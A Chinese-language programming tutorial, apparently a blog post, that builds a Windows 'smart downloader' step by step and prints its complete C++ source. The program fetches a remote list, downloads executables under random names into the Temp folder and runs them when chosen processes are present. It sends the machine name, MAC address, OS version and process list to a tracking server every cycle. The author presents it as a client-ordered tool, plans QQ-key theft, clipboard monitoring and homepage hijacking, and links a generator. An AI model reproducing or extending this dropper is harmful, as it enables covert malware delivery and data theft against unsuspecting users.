- 由于近期业务需要,根据客户要求订制一款智能下载器附带功能(判断进程、DLL运行、锁定浏览器主页、获取系统信息、截取QQ KEY、监控剪贴板、后台统计数据等等)
- 于是便有了想法教大家打造一款属于自己的智能下载器,高手略过。
Step 1
首先打开编译器(VS 2015)新建一个名为 downloader 的 win32 项目,并设置其属性。
Step 2
获取目标系统的相关信息并将远程列表文件下载到指定位置。
TCHAR szLBFile[MAX_PATH] = "http://192.168.6.1/load.txt"; // 远程列表文件地址
TCHAR szLBSaveFile[MAX_PATH] = { 0 }; // 列表文件本地保存地址
// 获取系统相关配置目录路径
// CSIDL_LOCAL_APPDATA
// FOLDERID_LocalAppData
// 版本 5.0。 用作本地(非roaming) 应用程序的数据存储库的文件系统目录。
// 典型路径为 C:\Documents and Settings\username\Local Settings\Application Data
SHGetSpecialFolderPath(NULL, szLBSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
lstrcat(szLBSaveFile, "\\Temp\\Load.tmp");
XXXDL kkkkkkk;
HMODULE hurlmon;
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szLBFile, szLBSaveFile, 0, NULL);
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);从 urlmon.dll 加载 URLDownloadToFileA 以用于下载相关文件。
Step 3
远程列表文件下载完成后,我们需要读取里面的数据并判断指定进程。
此处使用 fgets 函数来读取列表文件的每行数据。
TCHAR Buffer[MAX_PATH] = { 0 };
FILE *TK = fopen(szLBSaveFile, "r+");
while (fgets(Buffer, sizeof(Buffer), TK) != NULL)
{
...
}列表文件内容格式示例:
calc.exe|http://192.168.6.1/Hello.exe
notepad.exe|http://192.168.6.1/play.exe
conhost.exe|http://192.168.6.1/Wmplayer.exe- “calc.exe” 表示需要判断的目标进程
- “|” 为分隔符
- “http://192.168.6.1/Hello.exe” 为下载地址
然后使用 CString 中的 Find 来查找相应数据。
CString szProcess = NULL, szURL = NULL;
// 标记出找到的第一个逗号在myText中的以0为初始索引的序号。
// 找不到返回-1值
int pos = myText.Find("|");
if (pos >= 0)
{
// 目标进程
// 把左边的第一段放到szProcess中
szProcess.Format("%s", myText.Left(pos));
// 下载地址
// 把除第一段剩下的放到szURL中
szURL.Format("%s", myText.Mid(pos + 1));
} 
编译后,我们来看看效果。
演示图:
Step 4
以上所有操作都完成后,我们此刻可用提取到的数据来判断进程并下载指定文件。
CreateToolhelp32Snap
需要加入头文件 #include <tlhelp32.h>
函数通过获取进程信息为指定的进程、进程使用的堆[HEAP]、模块[MODULE]、线程建立一个快照。说到底,可以获取系统中正在运行的进程信息,线程信息,等。
BOOL GetProcessName(LPCTSTR szProcess)
{
HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe32x = {sizeof(PROCESSENTRY32),0};
if( Process32First(hShot,&pe32x) )
{
CString TargetName = NULL;
TargetName.Format("%s", szProcess);
TargetName.MakeLower();
do{
CString ProcessName = NULL;
ProcessName.Format("%s", pe32x.szExeFile);
ProcessName.MakeLower();
if( ProcessName == TargetName )
{
CloseHandle(hShot);
return TRUE;
}
}while( Process32Next(hShot, &pe32x) );
}
CloseHandle(hShot);
return FALSE;
}实例:
// 判断系统是否存在指定进程
if (GetProcessName(szProcess))
{
CString myEXESaveFile = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// 生成16位随机名称
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j<16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(50);
}
myEXESaveFile.Format(TEXT("%s\\%s.EXE"), szEXESaveFile, szRand2);
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szURL, myEXESaveFile, 0, NULL);
if (hRes == S_OK)
{
WinExec(myEXESaveFile, SW_SHOW);
}
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
}判断数据与当前系统信息:
效果演示:
Step 5
所有操作都完毕后,那么就需要开始弄我们的统计系统了。
统计信息包括(系统信息、MAC地址、机器名、IP地址、系统进程等等)
获取 MAC 地址:
/
typedef struct _ASTAT_
{
ADAPTER_STATUS adapt;
NAME_BUFFER NameBuff[30];
}ASTAT, *PASTAT;
UCHAR GetAddressByIndex(int lana_num, ASTAT & Adapter)
{
UCHAR uRetCode;
NCB ncb;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBRESET;
ncb.ncb_lana_num = lana_num;
uRetCode = Netbios(&ncb);
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBASTAT;
ncb.ncb_lana_num = lana_num;
lstrcpy((char *)ncb.ncb_callname, "* ");
ncb.ncb_buffer = (unsigned char *)&Adapter;
ncb.ncb_length = sizeof(Adapter);
uRetCode = Netbios(&ncb);
return uRetCode;
}
CString GetMacAddress(void)
{
CString strMacAddress;
NCB ncb;
UCHAR uRetCode;
int num = 0;
LANA_ENUM lana_enum;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBENUM;
ncb.ncb_buffer = (unsigned char *)&lana_enum;
ncb.ncb_length = sizeof(lana_enum);
uRetCode = Netbios(&ncb);
if (uRetCode == 0)
{
num = lana_enum.length;
for (int i = 0; i < num; i++)
{
ASTAT Adapter;
if (GetAddressByIndex(lana_enum.lana[i], Adapter) == 0)
{
strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"),
Adapter.adapt.adapter_address[0],
Adapter.adapt.adapter_address[1],
Adapter.adapt.adapter_address[2],
Adapter.adapt.adapter_address[3],
Adapter.adapt.adapter_address[4],
Adapter.adapt.adapter_address[5]);
}
}
}
return strMacAddress;
}读取注册表获取系统版本:
void GetWinOS()
{
HKEY hKEY;
LPCTSTR data_Set = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
long ret0=(RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY));
if(ret0 == ERROR_SUCCESS)
{
LPBYTE owner_Get1=new BYTE[80];
DWORD type_1=REG_SZ;
DWORD cbData_1=80;
ZeroMemory(osx, MAX_PATH * sizeof(CHAR));
long ret1=::RegQueryValueEx(hKEY, "ProductName", NULL, &type_1, owner_Get1, &cbData_1);
if(ret1 == ERROR_SUCCESS)
{
char *OSVersion = (char *)owner_Get1;
lstrcpy(osx, OSVersion);
}
else
{
lstrcpy(osx, "Unknow System");
}
}
RegCloseKey(hKEY);
// 判断是否 64 位系统
if(IsWow64OSEx())
{
lstrcat(osx, " x64");
}
else
{
lstrcat(osx, " x86");
}
}
BOOL IsWow64OSEx()
{
typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
LPFN_ISWOW64PROCESS fnIsWow64Process;
BOOL bIsWow64 = FALSE;
fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandle("kernel32"), "IsWow64Process");
if (NULL != fnIsWow64Process)
{
fnIsWow64Process(GetCurrentProcess(),&bIsWow64);
}
return bIsWow64;
}获取机器名:
WSADATA _wsaData = { 0 };
int _Result = 0;
_Result = WSAStartup(MAKEWORD(2,2),&_wsaData);
if(_Result == SOCKET_ERROR)
{
lstrcat(jsj,"unkonw1");
}
_Result = gethostname(jsj,sizeof(jsj));
if(_Result == SOCKET_ERROR)
{
lstrcat(jsj,"unkonw2");
}
WSACleanup();获取系统所有进程:
///
CString GetAllProcessNames()
{
CString AllProcessNames = NULL;
HANDLE hShot2 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe32 = {sizeof(PROCESSENTRY32),0};
if( Process32First(hShot2,&pe32) )
{
do{
CString GetProcessName = NULL;
GetProcessName.Format("%s", pe32.szExeFile);
AllProcessNames += GetProcessName;
AllProcessNames += "|";
}while( Process32Next(hShot2, &pe32) );
}
CloseHandle(hShot2);
return AllProcessNames;
}
连接后台统计数据:
BOOL SendDataToCount()
{
TCHAR dat[10240] = { 0 };
TCHAR jsj[MAX_PATH] = { 0 };
TCHAR mac[MAX_PATH] = { 0 };
WSADATA _wsaData = { 0 };
// 获取机器名称
int _Result = 0;
_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw1");
}
_Result = gethostname(jsj, sizeof(jsj));
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw2");
}
WSACleanup();
CString szMac = NULL;
szMac = GetMacAddress();
TCHAR *MAC = szMac.GetBuffer(szMac.GetLength() + 1);
CString szProcess = NULL;
szProcess = GetAllProcessNames();
TCHAR *PROCESS = szProcess.GetBuffer(szProcess.GetLength() + 1);
// 构建统计数据
lstrcpy(dat, szCountUrl);
lstrcat(dat, "?jc=");
lstrcat(dat, PROCESS);
lstrcat(dat, "&ver=");
lstrcat(dat, szVersion);
lstrcat(dat, "&ID=");
lstrcat(dat, szUserID);
lstrcat(dat, "&MN=");
lstrcat(dat, jsj);
lstrcat(dat, "&os=");
lstrcat(dat, osx);
lstrcat(dat, "&mac=");
lstrcat(dat, MAC);
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, dat, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
//AfxMessageBox(buffer);
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
char *myMSG1;
myMSG1 = strstr(buffer, "Fail");
char *myMSG2;
myMSG2 = strstr(buffer, "Success");
if (myMSG1 || myMSG2)
{
return TRUE;
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}编译后运行程序效果:
完整代码:
stdafx.h
// stdafx.h : 标准系统包含文件的包含文件,
// 或是经常使用但不常更改的
// 特定于项目的包含文件
//
#pragma once
#include "targetver.h"
#include <stdio.h>
#include <tchar.h>
#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // 某些 CString 构造函数将是显式的
#define _AFX_NO_MFC_CONTROLS_IN_DIALOGS // 移除对话框中的 MFC 控件支持
#ifndef VC_EXTRALEAN
#define VC_EXTRALEAN // 从 Windows 头中排除极少使用的资料
#endif
#include <afx.h>
#include <afxwin.h> // MFC 核心组件和标准组件
#include <afxext.h> // MFC 扩展
#ifndef _AFX_NO_OLE_SUPPORT
#include <afxdtctl.h> // MFC 对 Internet Explorer 4 公共控件的支持
#endif
#ifndef _AFX_NO_AFXCMN_SUPPORT
#include <afxcmn.h> // MFC 对 Windows 公共控件的支持
#endif // _AFX_NO_AFXCMN_SUPPORT
#include <iostream>
// TODO: 在此处引用程序需要的其他头文件
#include <time.h>
#include <tlhelp32.h>
#include <Nb30.h>
#pragma comment(lib, "Netapi32.lib")
#include <WinSock2.h>
#pragma comment(lib, "ws2_32.lib")
#include <Wininet.h>
#pragma comment(lib, "Wininet.lib") downloader.cpp
// downloader.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "downloader.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// 动态加载
typedef HRESULT(_stdcall *XXXDL)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
typedef HINTERNET(_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET(_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
BOOL GetProcessName(LPCTSTR szProcess);
CString GetAllProcessNames();
BOOL SendDataToCount();
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2);
void GetWinOS();
BOOL IsWow64OSEx();
CString GetMacAddress(void);
TCHAR szLBFile[MAX_PATH] = "http://192.168.6.1/load.txt"; // 远程列表文件地址
TCHAR szCountUrl[MAX_PATH] = "http://192.168.6.130"; // 程序统计接口地址
TCHAR szVersion[MAX_PATH] = "1.0"; // 程序版本号
TCHAR szUserID[MAX_PATH] = "admin"; // 客户编号
TCHAR szLBSaveFile[MAX_PATH] = { 0 }; // 列表文件本地保存地址
TCHAR szEXESaveFile[MAX_PATH] = { 0 }; // 下载的程序保存路径
TCHAR osx[MAX_PATH] = { 0 }; // 系统版本存放变量
TCHAR CGLB[10240] = { 0 }; // 分配 10M 内存来保存成功下载的地址
BOOL TJ = FALSE;
// 唯一的应用程序对象
CWinApp theApp;
using namespace std;
int main()
{
// 获取系统相关配置目录路径
// CSIDL_LOCAL_APPDATA
// FOLDERID_LocalAppData
// 版本 5.0。 用作本地(非roaming) 应用程序的数据存储库的文件系统目录。
// 典型路径为 C:\Documents and Settings\username\Local Settings\Application Data
SHGetSpecialFolderPath(NULL, szLBSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
SHGetSpecialFolderPath(NULL, szEXESaveFile, CSIDL_LOCAL_APPDATA, TRUE);
lstrcat(szLBSaveFile, "\\Temp\\Load.tmp");
lstrcat(szEXESaveFile, "\\Temp");
do{
XXXDL kkkkkkk;
HMODULE hurlmon;
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szLBFile, szLBSaveFile, 0, NULL);
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
Sleep(500);
CString myText = NULL;
TCHAR Buffer[MAX_PATH] = { 0 };
FILE *TK = fopen(szLBSaveFile, "r+");
while (fgets(Buffer, sizeof(Buffer), TK) != NULL)
{
myText.Format("%s", Buffer);
//AfxMessageBox(myText);
CString szProcess = NULL, szURL = NULL;
// 标记出找到的第一个逗号在myText中的以0为初始索引的序号。
// 找不到返回-1值
int pos = myText.Find("|");
if (pos >= 0)
{
// 目标进程
// 把左边的第一段放到szProcess中
szProcess.Format("%s", myText.Left(pos));
//AfxMessageBox(szProcess);
// 下载地址
// 把除第一段剩下的放到szURL中
szURL.Format("%s", myText.Mid(pos + 1));
//AfxMessageBox(szURL);
TCHAR *TargetURL = szURL.GetBuffer(szURL.GetLength() + 1);
// 判断成功列表里是否存在该下载地址
if ( !strstr(CGLB, TargetURL) )
{
// 判断系统是否存在指定进程
if (GetProcessName(szProcess))
{
CString myEXESaveFile = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// 生成16位随机名称
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(50);
}
myEXESaveFile.Format(TEXT("%s\\%s.EXE"), szEXESaveFile, szRand2);
//AfxMessageBox(myEXESaveFile);
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szURL, myEXESaveFile, 0, NULL);
if (hRes == S_OK)
{
WinExec(myEXESaveFile, SW_SHOW);
// 成功下载并运行后
// 保存地址在成功列表
// 防止程序重复下载
lstrcat(CGLB, TargetURL);
}
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
}
}
}
}
fclose(TK);
DeleteFile(szLBSaveFile);
if ( !TJ )
{
// 统计数据
if (SendDataToCount())
{
TJ = TRUE;
}
}
// 延时一分钟
Sleep(60000);
} while (1);
return 0;
}
BOOL GetProcessName(LPCTSTR szProcess)
{
HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32x = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot, &pe32x))
{
CString TargetName = NULL;
TargetName.Format(TEXT("%s"), szProcess);
TargetName.MakeLower();
do {
CString ProcessName = NULL;
ProcessName.Format("%s", pe32x.szExeFile);
ProcessName.MakeLower();
if (ProcessName == TargetName)
{
CloseHandle(hShot);
return TRUE;
}
} while (Process32Next(hShot, &pe32x));
}
CloseHandle(hShot);
return FALSE;
}
CString GetAllProcessNames()
{
CString AllProcessNames = "";
HANDLE hShot2 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot2, &pe32))
{
do {
CString GetProcessName = "";
GetProcessName.Format(TEXT("%s"), pe32.szExeFile);
AllProcessNames += GetProcessName;
AllProcessNames += "|";
} while (Process32Next(hShot2, &pe32));
}
CloseHandle(hShot2);
return AllProcessNames;
}
BOOL SendDataToCount()
{
TCHAR dat[10240] = { 0 };
TCHAR jsj[MAX_PATH] = { 0 };
WSADATA _wsaData = { 0 };
ZeroMemory(dat, 10240 * sizeof(TCHAR));
ZeroMemory(jsj, MAX_PATH * sizeof(TCHAR));
int _Result = 0;
_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw1");
}
_Result = gethostname(jsj, sizeof(jsj));
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw2");
}
WSACleanup();
GetWinOS();
CString szMac = NULL;
szMac = GetMacAddress();
TCHAR *MAC = szMac.GetBuffer(szMac.GetLength() + 1);
CString szProcess = NULL;
szProcess = GetAllProcessNames();
TCHAR *PROCESS = szProcess.GetBuffer(szProcess.GetLength() + 1);
// 构建统计数据
lstrcpy(dat, szCountUrl);
lstrcat(dat, "?jc=");
lstrcat(dat, PROCESS);
lstrcat(dat, "&ver=");
lstrcat(dat, szVersion);
lstrcat(dat, "&ID=");
lstrcat(dat, szUserID);
lstrcat(dat, "&MN=");
lstrcat(dat, jsj);
lstrcat(dat, "&os=");
lstrcat(dat, osx);
lstrcat(dat, "&mac=");
lstrcat(dat, MAC);
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, dat, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
char *myMSG1;
myMSG1 = strstr(buffer, "Fail");
char *myMSG2;
myMSG2 = strstr(buffer, "Success");
if (myMSG1 || myMSG2)
{
return TRUE;
}
else
{
// 由于提取的数据过长会导致统计失败
// 这里省去 szProcess 重新统计
TCHAR postData[1024] = { 0 };
ZeroMemory(postData, 1024 * sizeof(TCHAR));
lstrcpy(postData, szCountUrl);
lstrcat(postData, "?ver=");
lstrcat(postData, szVersion);
lstrcat(postData, "&ID=");
lstrcat(postData, szUserID);
lstrcat(postData, "&CP=");
lstrcat(postData, jsj);
lstrcat(postData, "&os=");
lstrcat(postData, osx);
lstrcat(postData, "&mac=");
lstrcat(postData, MAC);
if (PostDataToCount(postData, "Success", "Fail"))
{
return TRUE;
}
else
{
return FALSE;
}
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2)
{
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, szPostURL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
TCHAR *myMSG1;
myMSG1 = strstr(buffer, szState1);
TCHAR *myMSG2;
myMSG2 = strstr(buffer, szState2);
if (myMSG1 || myMSG2)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return TRUE;
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
void GetWinOS()
{
HKEY hKEY;
LPCTSTR data_Set = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
long ret0 = (RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY));
if (ret0 == ERROR_SUCCESS)
{
LPBYTE owner_Get1 = new BYTE[80];
DWORD type_1 = REG_SZ;
DWORD cbData_1 = 80;
ZeroMemory(osx, MAX_PATH * sizeof(TCHAR));
long ret1 = ::RegQueryValueEx(hKEY, "ProductName", NULL, &type_1, owner_Get1, &cbData_1);
if (ret1 == ERROR_SUCCESS)
{
char *OSVersion = (char *)owner_Get1;
lstrcpy(osx, OSVersion);
}
else
{
lstrcpy(osx, "Unknow System");
}
}
RegCloseKey(hKEY);
// 判断是否 64 位系统
if (IsWow64OSEx())
{
lstrcat(osx, " x64");
}
else
{
lstrcat(osx, " x86");
}
}
BOOL IsWow64OSEx()
{
typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
LPFN_ISWOW64PROCESS fnIsWow64Process;
BOOL bIsWow64 = FALSE;
fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandle("kernel32"), "IsWow64Process");
if (NULL != fnIsWow64Process)
{
fnIsWow64Process(GetCurrentProcess(), &bIsWow64);
}
return bIsWow64;
}
typedef struct _ASTAT_
{
ADAPTER_STATUS adapt;
NAME_BUFFER NameBuff[30];
}ASTAT, *PASTAT;
UCHAR GetAddressByIndex(int lana_num, ASTAT & Adapter)
{
UCHAR uRetCode;
NCB ncb;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBRESET;
ncb.ncb_lana_num = lana_num;
uRetCode = Netbios(&ncb);
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBASTAT;
ncb.ncb_lana_num = lana_num;
lstrcpy((char *)ncb.ncb_callname, "* ");
ncb.ncb_buffer = (unsigned char *)&Adapter;
ncb.ncb_length = sizeof(Adapter);
uRetCode = Netbios(&ncb);
return uRetCode;
}
CString GetMacAddress(void)
{
CString strMacAddress;
NCB ncb;
UCHAR uRetCode;
int num = 0;
LANA_ENUM lana_enum;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBENUM;
ncb.ncb_buffer = (unsigned char *)&lana_enum;
ncb.ncb_length = sizeof(lana_enum);
uRetCode = Netbios(&ncb);
if (uRetCode == 0)
{
num = lana_enum.length;
for (int i = 0; i < num; i++)
{
ASTAT Adapter;
if (GetAddressByIndex(lana_enum.lana[i], Adapter) == 0)
{
strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"),
Adapter.adapt.adapter_address[0],
Adapter.adapt.adapter_address[1],
Adapter.adapt.adapter_address[2],
Adapter.adapt.adapter_address[3],
Adapter.adapt.adapter_address[4],
Adapter.adapt.adapter_address[5]);
}
}
}
return strMacAddress;
}
结语
至此,属于自己的一款智能判断下载者已打造完毕,后续将教大家如何添加新功能,比如截取QQ KEY、监控剪贴板、锁定浏览器主页等。
完整项目下载
【源码下载】
https://download.csdn.net/download/qq_39190622/88357881
【Rainbow 统计系统下载】https://download.csdn.net/download/qq_39190622/88358271
【Rainbow 下载者 生成器下载 1】https://download.csdn.net/download/qq_39190622/88358280